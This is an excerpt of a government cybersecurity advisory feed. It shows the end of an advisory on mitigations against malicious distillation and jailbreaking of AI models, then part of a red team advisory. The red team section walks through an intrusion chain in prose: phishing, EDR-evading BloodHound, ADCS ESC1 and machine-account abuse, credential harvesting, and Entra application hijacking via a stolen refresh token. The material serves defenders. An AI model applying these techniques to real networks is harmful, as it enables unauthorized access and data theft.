&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0001&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0001&lt;/u&gt;&lt;/a&gt; - Limit Model Artifact Release: Limit release of data, algorithms, architectures, and model checkpoints.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0003&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0003&lt;/u&gt;&lt;/a&gt; - Predictive AI Model Hardening: Use adversarial training and defensive distillation to increase jailbreak difficulty.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://atlas.mitre.org/mitigations/AML.M0006&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;AML.M0006&lt;/u&gt;&lt;/a&gt; - Predictive AI Ensembles: Use multiple models so extracting one yields a less usable clone.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;NIST AI 100-2e2025: Adversarial machine learning mitigations&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;Mitigations in NIST’s “&lt;a href=&quot;https://csrc.nist.gov/pubs/ai/100/2/e2025/final&quot; target=&quot;_blank&quot;&gt;Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations&lt;/a&gt;” (NIST AI 100-2e2025) also apply to malicious distillation, including differential privacy, pre- and post-training interventions, and prompt instruction/formatting.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Differential privacy&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Differential Privacy (DP) provides mathematically rigorous protection against inference and distillation techniques by adding calibrated noise to model outputs and preventing malicious actors from extracting training data membership information and other sensitive model information, such as decision boundaries or signals that could help reconstruct private data. This protection is governed by privacy parameters that define a finite privacy budget, where each query consumes part of the model&#039;s available privacy protection and repeated querying steadily reduces the remaining privacy reserve.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;As that budget is consumed through accumulated queries, the model must either add more noise to preserve privacy, restrict further queries, or accept reduced privacy protection. This creates a fundamental noise-versus-utility tradeoff, where stronger privacy protection requires more noise, which can lower prediction precision and business usefulness, while less noise improves utility but increases vulnerability to compromise techniques, such as membership inference, model extraction, or inversion.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;In practice, the right balance requires careful tuning and empirical auditing, because theoretical privacy settings do not always predict real-world accuracy impact, particularly for complex models or high-dimensional outputs that require substantially more noise to achieve equivalent protection, or when facing adaptive actors. As a result, DP is often strengthened with complementary controls such as query rate limiting, response aggregation, and monitoring.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Pre/post-training interventions&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;A range of training strategies have been proposed to increase the difficulty of accessing harmful capabilities through prompt injection, including safety training during pre-training or post training, adversarial training methods, and other methods to make jailbreak techniques more difficult.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Prompt instruction/formatting&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Model instructions can cue the model to treat user input carefully, such as by wrapping user input in XML tags, appending specific instructions to the prompt, or otherwise attempting to clearly separate instructions from user prompts to mitigate distillation and make prompt injection or jailbreaking less effective.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Footnotes&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;sup&gt;1&lt;/sup&gt; &lt;a class=&quot;ck-anchor&quot; id=&quot;note1&quot;&gt;&lt;/a&gt;Publicly quoted training costs are from “&lt;a href=&quot;https://arxiv.org/pdf/2412.19437&quot; target=&quot;_blank&quot;&gt;DeepSeek-V3 Technical Report&lt;/a&gt;”&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;note2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;note2&quot;&gt;&lt;/a&gt; MITRE is a registered trademark of The MITRE Corporation. MITRE ATLAS is a trademark of The MITRE Corporation.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;References&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.anthropic.com/news/detecting-and-preventing-distillation-attacks&quot; target=&quot;_blank&quot;&gt;Anthropic: Detecting and preventing distillation attacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use&quot; target=&quot;_blank&quot;&gt;Google: GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nvlpubs.nist.gov/nistpubs/ai/NIST.AI.100-2e2025.pdf&quot; target=&quot;_blank&quot;&gt;NIST AI 100-2e2025: Adversarial Machine Learning A Taxonomy and Terminology of Attacks and Mitigations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://assets.bwbx.io/documents/users/iqjWHBFdfxIU/rRmql_jJcxb4/v0&quot; target=&quot;_blank&quot;&gt;OpenAI: RE: Updated Stakes for American-Led, Democratic AI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://the-decoder.com/how-chinas-gray-market-sells-claude-tokens-at-a-fraction-of-the-price/&quot; target=&quot;_blank&quot;&gt;The Decoder: How China&#039;s gray market sells Claude tokens at a fraction of the price&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.whitehouse.gov/presidential-actions/2026/06/national-security-presidential-memorandum-nspm-11/&quot; target=&quot;_blank&quot;&gt;White House National Security Presidential Memorandum 11 (NSPM-11): Artificial Intelligence in the National Security Enterprise&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.whitehouse.gov/wp-content/uploads/2026/04/NSTM-4.pdf&quot; target=&quot;_blank&quot;&gt;White House National Science and Technology Memorandum 4 (NSTM-4): Adversarial Distillation of American AI Models&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://x.com/mkratsios47/status/2079933645888880708&quot; target=&quot;_blank&quot;&gt;White House Office of Science and Technology Policy post on X&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;em&gt;&lt;strong&gt;Disclaimer of endorsement&lt;/strong&gt;&lt;/em&gt;&lt;/h4&gt;
&lt;p&gt;The information and opinions contained in this document are provided &quot;as is&quot; and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.&lt;/p&gt;
&lt;h4&gt;&lt;em&gt;&lt;strong&gt;Purpose&lt;/strong&gt;&lt;/em&gt;&lt;/h4&gt;
&lt;p&gt;This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.&lt;/p&gt;
&lt;h4&gt;&lt;em&gt;&lt;strong&gt;Contact&lt;/strong&gt;&lt;/em&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;National Security Agency&lt;/strong&gt;&lt;br&gt;Cybersecurity Report Feedback: &lt;a href=&quot;mailto:CybersecurityReports@nsa.gov&quot; target=&quot;_blank&quot;&gt;CybersecurityReports@nsa.gov&lt;/a&gt;&lt;br&gt;Defense Industrial Base Inquiries and Cybersecurity Services: &lt;a href=&quot;mailto:DIB_Defense@cyber.nsa.gov&quot; target=&quot;_blank&quot;&gt;DIB_Defense@cyber.nsa.gov&lt;/a&gt;&lt;br&gt;Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, &lt;a href=&quot;mailto:MediaRelations@nsa.gov&quot; target=&quot;_blank&quot;&gt;MediaRelations@nsa.gov&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cybersecurity and Infrastructure Security Agency&lt;/strong&gt;&lt;br&gt;CISA’s 24/7 Operations Center (&lt;a href=&quot;mailto:contact@cisa.dhs.gov&quot; target=&quot;_blank&quot;&gt;contact@cisa.dhs.gov&lt;/a&gt;), or by calling 1-844-Say-CISA (1-844-729-2472).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Federal Bureau of Investigation&lt;/strong&gt;&lt;br&gt;If you or someone you know has fallen victim to this campaign, file a complaint with &lt;a href=&quot;https://www.ic3.gov/&quot; target=&quot;_blank&quot;&gt;IC3&lt;/a&gt;.&lt;br&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description>
  <pubDate>Fri, 04 Sep 2026 12:12:28 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/25412</guid>
    </item>
<item>
  <title>A Tale of Two SOCs: Insights From Two Red Team Assessments</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-237a</link>
  <description>&lt;h2&gt;&lt;strong&gt;Advisory at a Glance&lt;/strong&gt;&lt;/h2&gt;
&lt;table&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;Title&lt;/th&gt;
&lt;td&gt;A Tale of Two SOCs: Insights From Two Red Team Assessments&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Original Publication&amp;nbsp;&lt;/th&gt;
&lt;td&gt;&lt;strong&gt;August 25, 2026&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Executive Summary&lt;/th&gt;
&lt;td&gt;
&lt;p&gt;The Cybersecurity and Infrastructure Security Agency (CISA) conducted simultaneous red team assessments at two organizations and observed different defensive outcomes. In both environments, the red team achieved full domain compromise and accessed sensitive business systems (SBSs) and cloud resources. Organization A failed to detect or contain the activity, but Organization B rapidly identified initial compromise attempts, isolated affected systems, and forced the red team into an assume breach model.&lt;/p&gt;
&lt;p&gt;This advisory details the red team’s activity and organizations’ defensive actions, offering lessons learned and mitigations to help critical infrastructure organizations strengthen detection, response, and protections in IT, cloud, and operational technology (OT) environments.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Lessons Learned&lt;/th&gt;
&lt;td&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Untuned detection tools lead to missed threats&lt;/strong&gt;. Without well-defined baselines and alert filtering, false positives and routine alerts overwhelm network defenders.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Organizational silos and bureaucratic hurdles prevent effective incident response&lt;/strong&gt;. Detection tools are only as effective as the people, processes, and procedures supporting them; fragmented communication, unclear responsibilities, and limited defender authority hinder effective incident response.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud environments are often an underestimated risk&lt;/strong&gt;. Organizations often lack security controls for cloud environments and processes for responding to a cloud compromise.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Key Actions&lt;/th&gt;
&lt;td&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;strong&gt;Establish and continuously maintain a baseline and reduce alert noise&lt;/strong&gt; by fine tuning.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Break down silos and empower network defenders&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement Conditional Access policies for workload identities&lt;/strong&gt; and monitor for excessive or unused permissions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Establish and regularly review comprehensive procedures for detecting, remediating, and revoking access/refresh tokens&lt;/strong&gt; in the event of a cloud compromise.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Intended Audience&lt;/th&gt;
&lt;td&gt;
&lt;p&gt;&lt;strong&gt;Organizations:&lt;/strong&gt; Federal Civilian Executive Branch agencies; state, local, tribal, and territorial governments; critical infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Roles:&lt;/strong&gt; &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/systems-administration&quot; target=&quot;_blank&quot; title=&quot;System administrators&quot;&gt;System administrators&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/incident-response&quot; target=&quot;_blank&quot; title=&quot;incident responders&quot;&gt;incident responders&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/defensive-cybersecurity&quot; target=&quot;_blank&quot; title=&quot;defensive cybersecurity analysts&quot;&gt;defensive cybersecurity analysts&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/vulnerability-analysis&quot; target=&quot;_blank&quot; title=&quot;vulnerability analysts&quot;&gt;vulnerability analysts&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/network-operations&quot; target=&quot;_blank&quot; title=&quot;network operators&quot;&gt;network operators&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/systems-security-management&quot; target=&quot;_blank&quot; title=&quot;security systems managers&quot;&gt;security systems managers&lt;/a&gt;, and all network defenders.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;The Cybersecurity and Infrastructure Security Agency’s (CISA’s) red team simulates real‑world malicious cyber operations to assess an organization’s ability to detect, investigate, and respond to malicious cyber activity. Emulating cyber threat actor tradecraft, the red team attempts to gain and maintain persistent access to an organization’s network and sensitive business systems (SBSs) while avoiding detection.&lt;/p&gt;
&lt;p&gt;CISA conducted two simultaneous red team assessments using similar tradecraft but observed different defensive responses. In one organization (Organization A), the team gained initial access to multiple workstations, gained elevated privileges over the domain, and moved laterally to SBSs and cloud resources undetected. In the second organization (Organization B), network defenders quickly detected the initial compromise and quarantined the affected systems.&lt;/p&gt;
&lt;p&gt;Because Organization B detected the initial compromise, the red team moved to an assume breach model, where Organization B trusted agents (TAs) provided access to a host that replicated the level of access the red team would have had if defenders had not detected their activity. From there, the red team escalated privileges and moved laterally to SBSs, cloud resources, and a bastion host in the OT demilitarized zone (DMZ), where defenders again detected activity and isolated the system.&lt;/p&gt;
&lt;p&gt;In coordination with the assessed organizations, CISA is releasing this Cybersecurity Advisory to describe the red team’s activity and the organization’s defensive responses and to share lessons learned that critical infrastructure organizations can use to strengthen their IT, cloud, and OT cybersecurity posture.&lt;/p&gt;
&lt;p&gt;CISA encourages critical infrastructure organizations to implement the recommendations in the &lt;a href=&quot;#Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;section of this advisory to reduce the likelihood and impact of malicious cyber incidents.&lt;/p&gt;
&lt;p&gt;Download the PDF version of this report:&lt;/p&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-08/aa26-237a-tale-of-two-SOCs-insights-two-red-team-assessments-508c.pdf&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;A Tale of Two SOCs: Insights From Two Red Team Assessments&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(PDF,       937.09 KB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Technical Details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This advisory uses the &lt;a href=&quot;https://attack.mitre.org/versions/v19/matrices/enterprise/&quot; target=&quot;_blank&quot; title=&quot;MITRE ATTACK Matrix for Enterprise&quot;&gt;MITRE ATT&amp;amp;CK&lt;sup&gt;®&lt;/sup&gt; Matrix for Enterprise&lt;/a&gt; framework, version 19.&amp;nbsp;See the &lt;a href=&quot;#MITRE&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt; section of this advisory for a table of the red team’s activity mapped to MITRE ATT&amp;amp;CK tactics and techniques.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;CISA is authorized—upon request—to provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and to provide operational and timely technical assistance to federal and non-federal entities, with respect to cybersecurity risks (see generally 6 U.S.C. §§ 652[c][5], 659[c][6]). CISA conducted two concurrent red team assessments: one at a &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector&quot;&gt;Government Services and Facilities Sector&lt;/a&gt; organization (Organization A), and one at a &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot;&gt;Water and Wastewater Systems Sector&lt;/a&gt; organization (Organization B).&lt;/p&gt;
&lt;p&gt;During CISA’s red team assessments, the red team simulates malicious cyber operations to assess an organization’s threat detection and response capabilities. The red team attempts to gain and maintain persistent access to an organization’s enterprise network, avoid detection, evade defenses, and access SBSs (applications, data stores, or infrastructure components where compromise would materially impact the organization&#039;s operations, finances, or customer data) selected by the organization. For the assessments described in this advisory, the team also attempted to gain access to cloud resources and to demonstrate their ability to access Organization B’s OT systems without actually doing so.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Organization A&lt;/strong&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;Red Team Cyber Threat Activity&lt;/strong&gt;&lt;/h4&gt;
&lt;h5&gt;&lt;em&gt;&lt;strong&gt;Initial Access and Active Directory Discovery&lt;/strong&gt;&lt;/em&gt;&lt;/h5&gt;
&lt;p&gt;During reconnaissance, CISA’s red team identified a web application with default credentials [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/001/&quot; target=&quot;_blank&quot; title=&quot;T1589.001&quot;&gt;T1589.001&lt;/a&gt;] for multiple built-in user accounts that allowed the team to send emails from an internal email address. The team used the internal email address to send phishing emails [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1566/&quot; target=&quot;_blank&quot; title=&quot;T1566&quot;&gt;T1566&lt;/a&gt;] and gained initial access to four workstations.&lt;/p&gt;
&lt;p&gt;From the workstations, the red team leveraged a modified BloodHound&lt;a href=&quot;#Note1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt; collector, customized to avoid static endpoint detection and response (EDR) signatures, to query and scrape Active Directory (AD) information. This information included AD users [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1087/002/&quot; target=&quot;_blank&quot; title=&quot;T1087.002&quot;&gt;T1087.002&lt;/a&gt;], computers [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1018/&quot; target=&quot;_blank&quot; title=&quot;T1018&quot;&gt;T1018&lt;/a&gt;], groups [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1069/002&quot; target=&quot;_blank&quot; title=&quot;T1069.002&quot;&gt;T1069.002&lt;/a&gt;], access control lists, organizational units, and group policy objects (GPOs) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1615/&quot; target=&quot;_blank&quot; title=&quot;T1615&quot;&gt;T1615&lt;/a&gt;]. The team found that one compromised workstation had the default Machine Account Quota (MAQ) of 10, allowing unprivileged users to add up to 10 computer accounts to the domain.&lt;/p&gt;
&lt;p&gt;The red team also queried the organization’s Active Directory Certificate Service (ADCS) certificate templates. Misconfigured ADCS templates are common and can allow low-privileged accounts to request a certificate on behalf of other users and computers, including highly privileged accounts. The team identified multiple templates with an ESC1 misconfiguration, which allows any user to request certificates for all users and computer accounts (see scenario ESC1 in SpecterOp’s &lt;a href=&quot;https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf&quot; target=&quot;_blank&quot;&gt;Certified Pre-Owned: Abusing Active Directory Certificate Services&lt;/a&gt;). The red team exploited the misconfigured MAQ to create a machine account [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1136/002/&quot; target=&quot;_blank&quot;&gt;T1136.002&lt;/a&gt;] and then exploited a misconfigured ADCS template to request a certificate for the newly created machine account [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1649/&quot; target=&quot;_blank&quot;&gt;T1649&lt;/a&gt;]. They could then obtain certificates for any user account, providing means for lateral movement.&lt;/p&gt;
&lt;h5&gt;&lt;em&gt;&lt;strong&gt;Post Exploitation: Privilege Escalation and Lateral Movement&lt;/strong&gt;&lt;/em&gt;&lt;/h5&gt;
&lt;h6&gt;Sensitive Business Systems&lt;/h6&gt;
&lt;p&gt;After the red team gained elevated privileges over the domain, they began post-exploitation activities and attempted to access SBSs. To access the SBSs, the team needed to identify their network location and security controls.&lt;/p&gt;
&lt;p&gt;The team’s plan to achieve SBS access included the following steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Use previously acquired AD data to identify users and groups related to the SBS.&lt;/li&gt;
&lt;li&gt;Query system center configuration manager (SCCM) servers to enumerate user-device relationships and identify the workstations assigned to each user [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1033/&quot; target=&quot;_blank&quot; title=&quot;T1033&quot;&gt;T1033&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Move laterally from the SCCM server to the target users’ workstations.&lt;/li&gt;
&lt;li&gt;Find credential material on the target user’s workstation to access the SBS.&lt;/li&gt;
&lt;li&gt;Verify administrative access to the SBS would allow compromise of the availability, integrity, and/or confidentiality of the system and its data.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For each SBS, the red team used similar discovery and initial access techniques but unique credential retrieval methods. For SBS 1, a database, the team located cleartext credentials on an administrative user’s workstation providing access to the system [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1552/&quot; target=&quot;_blank&quot; title=&quot;T1552&quot;&gt;T1552&lt;/a&gt;]. For SBS 2, also a database, the red team searched the targeted user’s workstations for &lt;code&gt;connections.json&lt;/code&gt; and &lt;code&gt;product-preferences.xml&lt;/code&gt; files for a Structured Query Language (SQL) developer tool. The team decrypted these files to obtain the cleartext password to the database [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1552/001/&quot; target=&quot;_blank&quot; title=&quot;T1552.001&quot;&gt;T1552.001&lt;/a&gt;]. For SBS 3, an automated processing system, the red team acquired long-lived static Amazon Web Service (AWS) identity and access management (IAM) user credentials saved in configuration files in targeted users’ home directories. These credentials do not expire because the organization had not configured credential expiration or rotation.&lt;/p&gt;
&lt;p&gt;For SBS 2 and 3, the red team expanded access beyond users’ physical workstations to include their virtual desktops, which limited their access to the active, interactive sessions held by users. While virtual workstations add security controls, such as segmenting networks of sensitive systems to only allow virtual hosts, they are generally synchronized with a root drive of the distributed file system (DFS). The red team compromised the root DFS drive, granting them access to local files of all users’ virtual desktops, regardless of the existence of an active session. This allowed the team to quickly search for cloud configuration files containing credentials and database connection files for thousands of users.&lt;/p&gt;
&lt;p&gt;The red team obtained administrative access to all targeted SBSs without defensive intervention by proxying tools [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1090/001/&quot; target=&quot;_blank&quot; title=&quot;T1090.001&quot;&gt;T1090.001&lt;/a&gt;] through compromised workstations and using the collected credentials.&lt;/p&gt;
&lt;h6&gt;Microsoft Entra Systems&lt;/h6&gt;
&lt;p&gt;After compromising the target SBSs, the red team attempted to compromise Organization A’s Microsoft cloud environment by compromising Organization A’s Microsoft Entra ID (formerly Azure AD) through applications. The team targeted Entra ID applications with Application permissions, which allow applications to access data without user consent (compared to Delegated permissions, which allow applications to access data with user consent). By compromising an application that had elevated Application permissions, the red team would gain the same permissions as the application because these applications operate outside the scope of traditional conditional access policies (CAPs) that provide controls for user access and activity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft’s &lt;a href=&quot;https://learn.microsoft.com/en-us/entra/identity/conditional-access/workload-identity&quot; target=&quot;_blank&quot; title=&quot;Conditional Access for workload identities&quot;&gt;Conditional Access for workload identities&lt;/a&gt; extends traditional CAPs to service principals (SPs) used by applications and governs Application permissions by allowing organizations to broadly apply access policies to applications. Implementing Conditional Access for workload identities would have protected against red team exploiting use of Application permissions; however, the red team never observed an organization using Conditional Access for workload identities.&lt;/p&gt;
&lt;p&gt;The team compromised applications and used their permissions by:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Enumerating the organization’s cloud resources using the publicly available tools, including AzureHound&lt;a href=&quot;#Note2&quot;&gt;&lt;sup&gt;2&lt;/sup&gt;&lt;/a&gt; and ROADrecon,&lt;a href=&quot;#Note3&quot;&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;/a&gt; to gather information about applications, their permissions, and their owners [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1526/&quot; target=&quot;_blank&quot; title=&quot;T1526&quot;&gt;T1526&lt;/a&gt;] [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/002/&quot; target=&quot;_blank&quot; title=&quot;T1588.002&quot;&gt;T1588.002&lt;/a&gt;].&lt;/li&gt;
&lt;li&gt;Identifying applications with elevated permissions to the Microsoft Graph Resource application programming interface (API), including the following:&lt;br&gt;
&lt;ol type=&quot;a&quot;&gt;
&lt;li&gt;&lt;code&gt;Mail.Read&lt;/code&gt; – Read Outlook emails.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Mail.ReadWrite&lt;/code&gt; – Read and write Outlook emails.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Chat.Read.All&lt;/code&gt; – Access Teams messages.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Files.Read.All&lt;/code&gt; – Access OneDrive.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Application.ReadWrite.All&lt;/code&gt; – Add Client Secrets to any application or SP.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AppRoleAssignment.ReadWrite.All&lt;/code&gt; – Lets an SP grant itself powerful Graph application permissions such as &lt;code&gt;Chat.Read.All&lt;/code&gt; or &lt;code&gt;RoleManagement.ReadWrite.Directory&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Identifying the owner of an application with &lt;code&gt;Mail.ReadWrite&lt;/code&gt; permissions.&lt;/li&gt;
&lt;li&gt;Moving laterally to the owner’s machine.&lt;/li&gt;
&lt;li&gt;Obtaining access to the user’s primary refresh token (PRT).&lt;br&gt;
&lt;ol type=&quot;a&quot;&gt;
&lt;li&gt;A PRT is a secure artifact specifically issued to Microsoft first-party token brokers to enable single sign-on (SSO) across the applications used on those devices. For more information about PRT, see Microsoft’s &lt;a href=&quot;https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token?tabs=windows-prt-issued%2Cbrowser-behavior-windows%2Cwindows-prt-used%2Cwindows-prt-renewal%2Cwindows-prt-protection%2Cwindows-apptokens%2Cwindows-browsercookies%2Cwindows-mfa&quot; target=&quot;_blank&quot; title=&quot;Understanding Primary Refresh Token (PRT) in Microsoft Entra ID&quot;&gt;Understanding Primary Refresh Token (PRT) in Microsoft Entra ID&lt;/a&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Using the PRT to request access and refresh tokens for the targeted application’s owner.&lt;br&gt;
&lt;ol type=&quot;a&quot;&gt;
&lt;li&gt;&lt;strong&gt;Access tokens&lt;/strong&gt; are short-lived tokens issued by Entra ID that grant a client permission to access specific resources or APIs on behalf of a user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Refresh tokens&lt;/strong&gt; are longer-lived tokens issued by Entra ID that allow a client to silently request new access tokens without requiring the user to sign in again.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Using the access token to add a new client secret to the target application.&lt;br&gt;
&lt;ol type=&quot;a&quot;&gt;
&lt;li&gt;A &lt;strong&gt;client secret&lt;/strong&gt; is a confidential string used by the application to authenticate itself to Entra ID during token requests.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Using the new client secret to request a new access token for the target application.&lt;/li&gt;
&lt;li&gt;Impersonating the application by using the access token [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/001/&quot; target=&quot;_blank&quot; title=&quot;T1550.001&quot;&gt;T1550.001&lt;/a&gt;] to retrieve and review target emails [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/&quot; target=&quot;_blank&quot; title=&quot;T1114&quot;&gt;T1114&lt;/a&gt;] via the Microsoft Graph API.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This allowed the red team to review security operations center (SOC) staff emails to see if SOC staff were aware of the compromise.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Organization A’s Response&lt;/strong&gt;&lt;/h4&gt;
